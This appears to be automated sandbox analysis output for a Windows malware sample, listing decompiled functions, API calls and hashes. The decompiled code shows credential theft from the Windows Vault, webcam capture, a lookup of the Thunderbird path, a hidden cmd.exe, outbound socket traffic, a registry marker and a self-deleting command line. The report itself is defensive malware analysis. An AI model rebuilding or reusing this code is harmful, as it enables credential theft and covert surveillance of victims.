                                      • Instruction ID: c4d693b1badcb637dcac61f4976d6e3572a229f9a1187e2e8ea7521fd25c95cc
                                      • Opcode Fuzzy Hash: 0cb41f9d21b498956cda43d494d1636b2a13cc2743eb420c67f53474d54964e2
                                      • Instruction Fuzzy Hash: 29218576900208AFCB41EF94C991EDE7BB9EF0C354B0081AAF5199B221DB31EA559F80
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      APIs
                                        • Part of subcall function 0043D344: WSAStartup.WS2_32(00000202,?), ref: 0043D361
                                        • Part of subcall function 0043D344: socket.WS2_32(00000002,00000001,00000000), ref: 0043D372
                                        • Part of subcall function 0043D344: gethostbyname.WS2_32(?), ref: 0043D380
                                        • Part of subcall function 0043D344: htons.WS2_32(?), ref: 0043D3A6
                                        • Part of subcall function 0043D344: connect.WS2_32(00000000,?,00000010), ref: 0043D3B9
                                      • recv.WS2_32(00000000,?,00000001,00000000), ref: 0043D137
                                      • recv.WS2_32(00000000,?,00000001,00000000), ref: 0043D14C
                                      • recv.WS2_32(00000000,?,00000002,00000000), ref: 0043D15F
                                      • htons.WS2_32(?), ref: 0043D16D
                                      • recv.WS2_32(00000000,?,00000004,00000000), ref: 0043D183
                                      • wsprintfA.USER32 ref: 0043D1D2
                                      • recv.WS2_32(00000000,?,000000FF,00000000), ref: 0043D1EA
                                        • Part of subcall function 0043D25C: send.WS2_32(00000000,?,00000001,00000000), ref: 0043D27B
                                        • Part of subcall function 0043D25C: send.WS2_32(00000000,00000000,00000001,00000000), ref: 0043D290
                                        • Part of subcall function 0043D25C: send.WS2_32(00000000,00000000,00000001,00000000), ref: 0043D2A5
                                        • Part of subcall function 0043D2BD: ioctlsocket.WS2_32(00000000,4004667F,00000000), ref: 0043D2DA
                                        • Part of subcall function 0043D2BD: recv.WS2_32(00000000,?,00000800,00000000), ref: 0043D30E
                                        • Part of subcall function 0043D2BD: send.WS2_32(00000000,?,00000000,00000000), ref: 0043D327
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: recv$send$htons$Startupconnectgethostbynameioctlsocketsocketwsprintf
                                      • String ID: %u.%u.%u.%u
                                      • API String ID: 735718650-1542503432
                                      • Opcode ID: a66bd09cd45f0030507bd1f3e7755f9bceb9c9618648205497e9319b56de8da4
                                      • Instruction ID: aecc144625a0f33f690da54a8ef49ef0a35b00de87b525841307d1c00e484def
                                      • Opcode Fuzzy Hash: a66bd09cd45f0030507bd1f3e7755f9bceb9c9618648205497e9319b56de8da4
                                      • Instruction Fuzzy Hash: 1941333160430667D715A669AC84FBFB2DEAFC8304F00146BF994D61D1E668C90AC79E
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      C-Code - Quality: 80%
                                      			E00432803() {
                                      				char _v8;
                                      				struct _PROCESS_INFORMATION _v24;
                                      				struct _STARTUPINFOA _v92;
                                      				char _v352;
                                      				char _v816;
                                      				char _v817;
                                      				char _v872;
                                      				void* _t63;
                                      				void* _t70;
                                      				void* _t73;
                                      
                                      				_t63 = _t70;
                                      				_t73 = _t63;
                                      				E0043EECF(_t73 + 0x10);
                                      				if( *((intOrPtr*)(_t73 + 0x68)) != 0) {
                                      					TerminateThread( *0x44679c, 0);
                                      				}
                                      				if( *((intOrPtr*)(_t73 + 0x50)) != 0) {
                                      					E0043EFFE(_t73 + 4,  *((intOrPtr*)(_t73 + 8)), _t73 + 0x14, 0x20006, 0);
                                      					E0043345A( &_v8, _t73 + 0x54);
                                      					E0043EEEA(_t73 + 4,  &_v8);
                                      					E00435A2D(_v8);
                                      					E0043EF4C(_t73 + 4);
                                      				}
                                      				E00431052( &_v92, 0, 0x44);
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				GetModuleFileNameA(0,  &_v352, 0x104);
                                      				E0043102C( &_v872, "cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q ", 0x37);
                                      				E0043102C( &_v817, "\"", 1);
                                      				E0043102C( &_v816,  &_v352, E004310D5( &_v352));
                                      				E0043102C(E004310D5( &_v352) + 0x38 +  &_v872, "\"", 2);
                                      				CreateProcessA(0,  &_v872, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
                                      				CloseHandle(_v24.hThread);
                                      				CloseHandle(_v24);
                                      				ExitProcess(0);
                                      			}

                                      Instruction addresses of the listing above, one per decompiled line, in listing order (address gutter detached from the code by extraction):
                                      0x00432803 0x0043f52f 0x0043f534 0x0043f53e 0x0043f547 0x0043f547 0x0043f550 0x0043f564
                                      0x0043f570 0x0043f57b 0x0043f583 0x0043f58a 0x0043f58a 0x0043f596 0x0043f5a0 0x0043f5a4
                                      0x0043f5aa 0x0043f5ab 0x0043f5b4 0x0043f5c8 0x0043f5dc 0x0043f5fc 0x0043f61c 0x0043f63e
                                      0x0043f64d 0x0043f652 0x0043f655

                                      APIs
                                        • Part of subcall function 0043EECF: RegDeleteKeyW.ADVAPI32(80000001,?), ref: 0043EED6
                                      • TerminateThread.KERNEL32(00000000,?,?), ref: 0043F547
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 0043F5B4
                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0043F63E
                                      • CloseHandle.KERNEL32(?), ref: 0043F64D
                                      • CloseHandle.KERNEL32(?), ref: 0043F652
                                      • ExitProcess.KERNEL32 ref: 0043F655
                                      Strings
                                      • cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q , xrefs: 0043F5C2
                                      • |FD, xrefs: 0043F5CF
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcess$CreateDeleteExitFileModuleNameTerminateThread
                                      • String ID: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q $|FD
                                      • API String ID: 3630425516-2779118983
                                      • Opcode ID: b766fda1ebfaac2a9a06ebbb19aa73bc4684d4d03ca135058cd9d62edbb8d175
                                      • Instruction ID: e8f3c25833ee886699086a2e719cb312b512d0d768c31e5bdeaed5d91f71bcec
                                      • Opcode Fuzzy Hash: b766fda1ebfaac2a9a06ebbb19aa73bc4684d4d03ca135058cd9d62edbb8d175
                                      • Instruction Fuzzy Hash: BD3174B2900618BFDB15EBE1CD86EEF777DEB08304F401466B605A2151DB78AF48CBA5
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 68%
                                      			E0043FCD9() {
                                      				void* _v8;
                                      				struct _PROCESS_INFORMATION _v24;
                                      				struct _STARTUPINFOA _v100;
                                      				int _t10;
                                      				void* _t23;
                                      				int _t24;
                                      				CHAR* _t26;
                                      
                                      				_v8 = 0;
                                      				_t10 = GetCurrentProcess();
                                      				__imp__IsWow64Process(_t10,  &_v8);
                                      				if(_t10 != 0) {
                                      					if(_v8 == 0) {
                                      						_t10 = E0043FE7E(_t23, __eflags);
                                      						__eflags = _t10;
                                      						if(_t10 != 0) {
                                      							_t24 = _t10;
                                      							goto L6;
                                      						}
                                      					} else {
                                      						_t26 = VirtualAlloc(0, 0xff, 0x1000, 0x40);
                                      						GetWindowsDirectoryA(_t26, 0x104);
                                      						E0043102C( &(_t26[lstrlenA(_t26)]), "\\System32\\cmd.exe", 0x14);
                                      						E00431052( &_v100, 0, 0x44);
                                      						asm("stosd");
                                      						asm("stosd");
                                      						asm("stosd");
                                      						asm("stosd");
                                      						_t10 = CreateProcessA(_t26, 0, 0, 0, 0, 0x8000000, 0, 0,  &_v100,  &_v24);
                                      						if(_t10 != 0) {
                                      							Sleep(0x3e8);
                                      							_t24 = _v24.dwProcessId;
                                      							L6:
                                      							return E0043FD9E(_t24);
                                      						}
                                      					}
                                      				}
                                      				return _t10;
                                      			}

                                      Instruction addresses of the listing above, one per decompiled line, in listing order (address gutter detached from the code by extraction; 0x00000000 marks lines without an address):
                                      0x0043fce8 0x0043fceb 0x0043fcf2 0x0043fcfa 0x0043fd03 0x0043fd89 0x0043fd8e 0x0043fd90
                                      0x0043fd92 0x00000000 0x0043fd92 0x0043fd09 0x0043fd1c 0x0043fd24 0x0043fd3b 0x0043fd4a
                                      0x0043fd54 0x0043fd58 0x0043fd59 0x0043fd5a 0x0043fd6f 0x0043fd77 0x0043fd7e 0x0043fd84
                                      0x0043fd94 0x00000000 0x0043fd94 0x0043fd77 0x0043fd03 0x0043fd9d

                                      APIs
                                      • GetCurrentProcess.KERNEL32(00441382,?,?,00000000), ref: 0043FCEB
                                      • IsWow64Process.KERNEL32(00000000,?,?,00000000), ref: 0043FCF2
                                      • VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000040,?,?,00000000), ref: 0043FD16
                                      • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,?,00000000), ref: 0043FD24
                                      • lstrlenA.KERNEL32(00000000,\System32\cmd.exe,00000014,?,?,00000000), ref: 0043FD32
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0043FD6F
                                      • Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 0043FD7E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AllocCreateCurrentDirectorySleepVirtualWindowsWow64lstrlen
                                      • String ID: \System32\cmd.exe
                                      • API String ID: 3151064845-2003734499
                                      • Opcode ID: 3517932b25427f577c54faa0c07de24b56f954c5ea8c14622f7d7c1f47060c2d
                                      • Instruction ID: 71593c5467e28dd15412ec48e9278d96172e44a20ad05dcd00c49c3e56c1c65b
                                      • Opcode Fuzzy Hash: 3517932b25427f577c54faa0c07de24b56f954c5ea8c14622f7d7c1f47060c2d
                                      • Instruction Fuzzy Hash: BA1196B5A00308BFE7109BF5DD89FAF766CDB09744F000436B706E6190DAB89E088679
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 100%
                                      			E0043ADBE(WCHAR* __ecx, char* __edx, void* __eflags) {
                                      				void* _v8;
                                      				int _v12;
                                      				int _v16;
                                      				short _v536;
                                      				char* _t32;
                                      				WCHAR* _t33;
                                      
                                      				_v12 = 0x104;
                                      				_v16 = 1;
                                      				_t32 = __edx;
                                      				_t33 = __ecx;
                                      				E00431052( &_v536, 0, 0x104);
                                      				lstrcpyW( &_v536, L"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\");
                                      				lstrcatW( &_v536, _t33);
                                      				if(RegOpenKeyExW(0x80000002,  &_v536, 0, 1,  &_v8) != 0) {
                                      					return 0;
                                      				}
                                      				RegQueryValueExW(_v8, L"Path", 0,  &_v16, _t32,  &_v12);
                                      				RegCloseKey(_v8);
                                      				return 1;
                                      			}
                                      0x0043add2
                                      0x0043addc
                                      0x0043ade2
                                      0x0043ade4
                                      0x0043ade6
                                      0x0043adfa
                                      0x0043ae08
                                      0x0043ae29
                                      0x00000000
                                      0x0043ae51
                                      0x0043ae3e
                                      0x0043ae47
                                      0x00000000

                                      APIs
                                      • lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0043ADFA
                                      • lstrcatW.KERNEL32(?,thunderbird.exe), ref: 0043AE08
                                      • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,004393CF,?,00000104,00000000), ref: 0043AE21
                                      • RegQueryValueExW.ADVAPI32(004393CF,Path,00000000,?,?,?,?,00000104,00000000), ref: 0043AE3E
                                      • RegCloseKey.ADVAPI32(004393CF,?,00000104,00000000), ref: 0043AE47
                                      Strings
                                      • Path, xrefs: 0043AE36
                                      • thunderbird.exe, xrefs: 0043AE00
                                      • Software\Microsoft\Windows\CurrentVersion\App Paths\, xrefs: 0043ADF4
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenQueryValuelstrcatlstrcpy
                                      • String ID: Path$Software\Microsoft\Windows\CurrentVersion\App Paths\$thunderbird.exe
                                      • API String ID: 3135247354-1374996286
                                      • Opcode ID: 192725afc994be4b017beb16ddfb8f32ae7e2eb824d3615e7476867fce128a98
                                      • Instruction ID: 5a798d5954ffe8799e54ed20458ec2c87cadc8b9d356511062dd964af6ee600c
                                      • Opcode Fuzzy Hash: 192725afc994be4b017beb16ddfb8f32ae7e2eb824d3615e7476867fce128a98
                                      • Instruction Fuzzy Hash: B811307694010DBFE7109F94DE49FEA77BCEB15705F500076B609E2150E6B49E04CB65
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 61%
                                      			E00440500(intOrPtr __ecx, intOrPtr _a4) {
                                      				signed int _v12;
                                      				signed int _v16;
                                      				signed int _v20;
                                      				signed int _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v58;
                                      				intOrPtr _v64;
                                      				intOrPtr _v68;
                                      				void* _v128;
                                      				char _v144;
                                      				intOrPtr _v148;
                                      				char _v216;
                                      				intOrPtr* _t63;
                                      				intOrPtr* _t76;
                                      				intOrPtr* _t80;
                                      				signed int _t82;
                                      				intOrPtr* _t89;
                                      				intOrPtr* _t91;
                                      				intOrPtr* _t92;
                                      				intOrPtr* _t93;
                                      				intOrPtr* _t94;
                                      				intOrPtr* _t95;
                                      				intOrPtr* _t96;
                                      				intOrPtr* _t98;
                                      				signed int _t103;
                                      				intOrPtr* _t115;
                                      				intOrPtr* _t118;
                                      				void* _t121;
                                      
                                      				_v28 = __ecx;
                                      				__imp__CoInitialize(0);
                                      				_v12 = 0;
                                      				_v16 = 0;
                                      				_t118 = 0;
                                      				_v20 = 0;
                                      				_t89 = 0;
                                      				_v24 = 0;
                                      				_t115 = __imp__CoCreateInstance;
                                      				_t63 =  *_t115(0x442560, 0, 1, 0x444854,  &_v24);
                                      				_t91 = _v24;
                                      				if(_t91 == 0) {
                                      					L8:
                                      					_t92 = _v12;
                                      					if(_t92 != 0) {
                                      						_t63 =  *((intOrPtr*)( *_t92 + 8))(_t92);
                                      						_v12 = _v12 & 0x00000000;
                                      					}
                                      					L10:
                                      					_t93 = _v16;
                                      					if(_t93 != 0) {
                                      						_t63 =  *((intOrPtr*)( *_t93 + 8))(_t93);
                                      						_v16 = _v16 & 0x00000000;
                                      					}
                                      					_t94 = _v20;
                                      					if(_t94 != 0) {
                                      						_t63 =  *((intOrPtr*)( *_t94 + 8))(_t94);
                                      						_v20 = _v20 & 0x00000000;
                                      					}
                                      					_t95 = _v24;
                                      					if(_t95 != 0) {
                                      						_t63 =  *((intOrPtr*)( *_t95 + 8))(_t95);
                                      						_v24 = _v24 & 0x00000000;
                                      					}
                                      					if(_t118 != 0) {
                                      						_t63 =  *((intOrPtr*)( *_t118 + 8))(_t118);
                                      					}
                                      					if(_t89 != 0) {
                                      						_t63 =  *((intOrPtr*)( *_t89 + 8))(_t89);
                                      					}
                                      					__imp__CoUninitialize();
                                      					return _t63;
                                      				}
                                      				_t63 =  *((intOrPtr*)( *_t91))(_t91, 0x442540,  &_v16);
                                      				_t96 = _v16;
                                      				if(_t96 == 0) {
                                      					goto L8;
                                      				}
                                      				 *((intOrPtr*)( *_t96 + 4))(_t96);
                                      				_t63 = E00440831(_a4,  &_v12);
                                      				if(_v12 == 0) {
                                      					goto L10;
                                      				}
                                      				_t63 =  *_t115(0x4425b0, 0, 1, 0x444844,  &_v20);
                                      				_t98 = _v20;
                                      				if(_t98 != 0) {
                                      					 *((intOrPtr*)( *_t98 + 0xc))(_t98, _v12, L"Source");
                                      					_t76 = _v20;
                                      					 *((intOrPtr*)( *_t76 + 0xc))(_t76, _v16, L"Grabber");
                                      					E00431052( &_v144, 0, 0x48);
                                      					_t80 = _v24;
                                      					asm("movsd");
                                      					asm("movsd");
                                      					asm("movsd");
                                      					asm("movsd");
                                      					asm("movsd");
                                      					asm("movsd");
                                      					asm("movsd");
                                      					asm("movsd");
                                      					 *((intOrPtr*)( *_t80 + 0x10))(_t80,  &_v144);
                                      					_t63 = E0044044E();
                                      					_t118 = _t63;
                                      					if(_t118 != 0) {
                                      						_t63 = E0044046A();
                                      						_t89 = _t63;
                                      						if(_t89 != 0) {
                                      							_t103 = _v20;
                                      							_t63 =  *((intOrPtr*)( *_t103 + 0x2c))(_t103, _t118, _t89);
                                      							if(_t63 >= 0) {
                                      								_t82 = _v24;
                                      								 *((intOrPtr*)( *_t82 + 0x14))(_t82,  &_v216);
                                      								_t105 = _v148;
                                      								_t113 = _v148 + 0x30;
                                      								E0043102C(_t121 + _v148 + 0x30 - _t105 - 0x74, _v148 + 0x30, 0x28);
                                      								E004402B1( &_v216);
                                      								_t63 = E004408F0(_v28, _t113, _a4, _v64, _v68, _v58);
                                      							}
                                      						}
                                      					}
                                      				}
                                      				goto L8;
                                      			}
                                      0x0044050e
                                      0x00440512
                                      0x0044051b
                                      0x00440527
                                      0x0044052a
                                      0x0044052c
                                      0x0044052f
                                      0x00440531
                                      0x00440534
                                      0x0044053f
                                      0x00440541
                                      0x00440546
                                      0x00440670
                                      0x00440670
                                      0x00440675
                                      0x0044067a
                                      0x0044067d
                                      0x0044067d
                                      0x00440681
                                      0x00440681
                                      0x00440686
                                      0x0044068b
                                      0x0044068e
                                      0x0044068e
                                      0x00440692
                                      0x00440697
                                      0x0044069c
                                      0x0044069f
                                      0x0044069f
                                      0x004406a3
                                      0x004406a8
                                      0x004406ad
                                      0x004406b0
                                      0x004406b0
                                      0x004406b6
                                      0x004406bb
                                      0x004406bb
                                      0x004406c0
                                      0x004406c5
                                      0x004406c5
                                      0x004406c8
                                      0x004406d2
                                      0x004406d2
                                      0x00440558
                                      0x0044055a
                                      0x0044055f
                                      0x00000000
                                      0x00000000
                                      0x00440568
                                      0x00440571
                                      0x00440579
                                      0x00000000
                                      0x00000000
                                      0x00440590
                                      0x00440592
                                      0x00440597
                                      0x004405a8
                                      0x004405ab
                                      0x004405b9
                                      0x004405c6
                                      0x004405d0
                                      0x004405e2
                                      0x004405e5
                                      0x004405e6
                                      0x004405e7
                                      0x004405f0
                                      0x004405f1
                                      0x004405f2
                                      0x004405f3
                                      0x004405f6
                                      0x004405fc
                                      0x00440601
                                      0x00440605
                                      0x0044060a
                                      0x0044060f
                                      0x00440613
                                      0x00440615
                                      0x0044061d
                                      0x00440622
                                      0x00440624
                                      0x00440631
                                      0x00440634
                                      0x0044063c
                                      0x00440649
                                      0x00440657
                                      0x0044066b
                                      0x0044066b
                                      0x00440622
                                      0x00440613
                                      0x00440605
                                      0x00000000

                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 00440512
                                      • CoCreateInstance.OLE32(00442560,00000000,00000001,00444854,00440041), ref: 0044053F
                                      • CoUninitialize.OLE32 ref: 004406C8
                                        • Part of subcall function 00440831: CoCreateInstance.OLE32(004425A0,00000000,00000001,00444834,?), ref: 0044085F
                                      • CoCreateInstance.OLE32(004425B0,00000000,00000001,00444844,?), ref: 00440590
                                        • Part of subcall function 004402B1: CoTaskMemFree.OLE32(?), ref: 004402BF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInstance$FreeInitializeTaskUninitialize
                                      • String ID: Grabber$Source$vids
                                      • API String ID: 533512943-4200688928
                                      • Opcode ID: 55870100d3fff4eba4b338b24ae90e04cbb8094ee716ade290d21c1e7b197326
                                      • Instruction ID: 463e9ebc5deb1b705b0bd527fae181403ea15e9dc447d55f693ad86090787971
                                      • Opcode Fuzzy Hash: 55870100d3fff4eba4b338b24ae90e04cbb8094ee716ade290d21c1e7b197326
                                      • Instruction Fuzzy Hash: D3516E71A00209AFEB14DFA5C894FAFB7B9BF84705F15406EF605AB260CBB59D10CB64
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      C-Code - Quality: 94%
                                      			E0043A1FF(void* __ecx) {
                                      				struct HINSTANCE__* _t17;
                                      				intOrPtr _t21;
                                      				intOrPtr _t24;
                                      				void* _t27;
                                      				void* _t45;
                                      
                                      				_t27 = __ecx;
                                      				_t45 = __ecx;
                                      				_t17 = LoadLibraryA("vaultcli.dll");
                                      				 *(_t45 + 0xc0) = _t17;
                                      				_t46 = _t17;
                                      				if(_t17 == 0) {
                                      					L7:
                                      					__eflags = 0;
                                      					return 0;
                                      				} else {
                                      					_push(_t27);
                                      					 *((intOrPtr*)(_t45 + 0x8c)) = E0043E907(_t17, "VaultOpenVault", _t46);
                                      					 *((intOrPtr*)(_t45 + 0x90)) = E0043E907( *(_t45 + 0xc0), "VaultCloseVault", _t46);
                                      					_t21 = E0043E907( *(_t45 + 0xc0), "VaultEnumerateItems", _t46);
                                      					_t43 = "VaultGetItem";
                                      					 *((intOrPtr*)(_t45 + 0x94)) = _t21;
                                      					 *((intOrPtr*)(_t45 + 0x98)) = E0043E907( *(_t45 + 0xc0), "VaultGetItem", _t46);
                                      					 *((intOrPtr*)(_t45 + 0x9c)) = E0043E907( *(_t45 + 0xc0), _t43, _t46);
                                      					_t24 = E0043E907( *(_t45 + 0xc0), "VaultFree", _t46);
                                      					 *((intOrPtr*)(_t45 + 0xa0)) = _t24;
                                      					if( *((intOrPtr*)(_t45 + 0x8c)) == 0 ||  *((intOrPtr*)(_t45 + 0x94)) == 0 ||  *((intOrPtr*)(_t45 + 0x90)) == 0 ||  *((intOrPtr*)(_t45 + 0x98)) == 0 || _t24 == 0) {
                                      						goto L7;
                                      					} else {
                                      						return 1;
                                      					}
                                      				}
                                      			}
                                      0x0043a1ff
                                      0x0043a205
                                      0x0043a207
                                      0x0043a20d
                                      0x0043a213
                                      0x0043a215
                                      0x0043a2c9
                                      0x0043a2c9
                                      0x0043a2cc
                                      0x0043a21b
                                      0x0043a21c
                                      0x0043a234
                                      0x0043a24a
                                      0x0043a250
                                      0x0043a25b
                                      0x0043a262
                                      0x0043a275
                                      0x0043a28b
                                      0x0043a291
                                      0x0043a299
                                      0x0043a2a6
                                      0x00000000
                                      0x0043a2c4
                                      0x0043a2c8
                                      0x0043a2c8
                                      0x0043a2a6

                                      APIs
                                      • LoadLibraryA.KERNEL32(vaultcli.dll), ref: 0043A207
                                        • Part of subcall function 0043E907: lstrcmpA.KERNEL32(?,0043F9CB,?,open,0043F9CB), ref: 0043E940
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoadlstrcmp
                                      • String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                      • API String ID: 2493137890-3967309459
                                      • Opcode ID: cfe1a34b35f1579b883c8e976363de6a0deeb2fc0499d3ea0aed678673c90745
                                      • Instruction ID: 4a9cc393abbc4d53e7958efbcbab76834aa6bf3cbcbcc3efae952825c0a49ff7
                                      • Opcode Fuzzy Hash: cfe1a34b35f1579b883c8e976363de6a0deeb2fc0499d3ea0aed678673c90745
                                      • Instruction Fuzzy Hash: AE114274A01B008BEB64AF329805B9376E1BF84315F54593FE4EE87785DB78AC01CB18
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 100%
                                      			E0043B81D(short** _a4, int _a8) {
                                      				void* _t3;
                                      				short* _t9;
                                      				void* _t12;
                                      				short* _t14;
                                      				void* _t16;
                                      
                                      				_t14 = 0;
                                      				_t3 = OpenSCManagerW(0, L"ServicesActive", 1);
                                      				_t16 = _t3;
                                      				if(_t16 != 0) {
                                      					_t12 = OpenServiceW(_t16,  *_a4, 2);
                                      					if(_t12 != 0) {
                                      						if(ChangeServiceConfigW(_t12, 0xffffffff, _a8, 0xffffffff, 0, 0, 0, 0, 0, 0, 0) != 0) {
                                      							_t14 = 1;
                                      						}
                                      						CloseServiceHandle(_t16);
                                      						CloseServiceHandle(_t12);
                                      						_t9 = _t14;
                                      					} else {
                                      						CloseServiceHandle(_t16);
                                      						_t9 = 0;
                                      					}
                                      					return _t9;
                                      				}
                                      				return _t3;
                                      			}
                                      0x0043b829
                                      0x0043b82c
                                      0x0043b832
                                      0x0043b836
                                      0x0043b847
                                      0x0043b84b
                                      0x0043b86f
                                      0x0043b873
                                      0x0043b873
                                      0x0043b87b
                                      0x0043b87e
                                      0x0043b880
                                      0x0043b84d
                                      0x0043b84e
                                      0x0043b854
                                      0x0043b854
                                      0x00000000
                                      0x0043b882
                                      0x0043b886

                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0043B82C
                                      • OpenServiceW.ADVAPI32(00000000,?,00000002), ref: 0043B841
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0043B84E
                                      • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0043B867
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0043B87B
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0043B87E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                      • String ID: ServicesActive
                                      • API String ID: 493672254-3071072050
                                      • Opcode ID: 11c690618eda6fa73f9e44f70cba276c87657f934e037943a50cdf243024f44d
                                      • Instruction ID: ca1dd63e7ec14a5382d564e5acf646a1c1f96a770e9747a4b342cd203906f61f
                                      • Opcode Fuzzy Hash: 11c690618eda6fa73f9e44f70cba276c87657f934e037943a50cdf243024f44d
                                      • Instruction Fuzzy Hash: 55F0AF356042257797252B669D49F5B3A9CDF8A771B404232F715D22A1CAA88C00C6F8
                                      Uniqueness

                                      Uniqueness Score: 4.31%

                                      C-Code - Quality: 100%
                                      			E0043F7D0(void* __ecx) {
                                      				void* _v8;
                                      				int _v12;
                                      				short* _t16;
                                      
                                      				_t16 = L"SOFTWARE\\_rptls";
                                      				if(RegOpenKeyExW(0x80000001, _t16, 0, 0xf003f,  &_v8) != 0) {
                                      					RegCreateKeyExW(0x80000001, _t16, 0, 0, 0, 0xf003f, 0,  &_v8,  &_v12);
                                      				}
                                      				RegSetValueExW(_v8, L"Install", 0, 1, 0x4468a8, lstrlenW(0x4468a8) << 2);
                                      				return RegCloseKey(_v8);
                                      			}

                                      APIs
                                      • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,000F003F,?,00000208,004468A8,?,?,?,?,0043F87F), ref: 0043F7F0
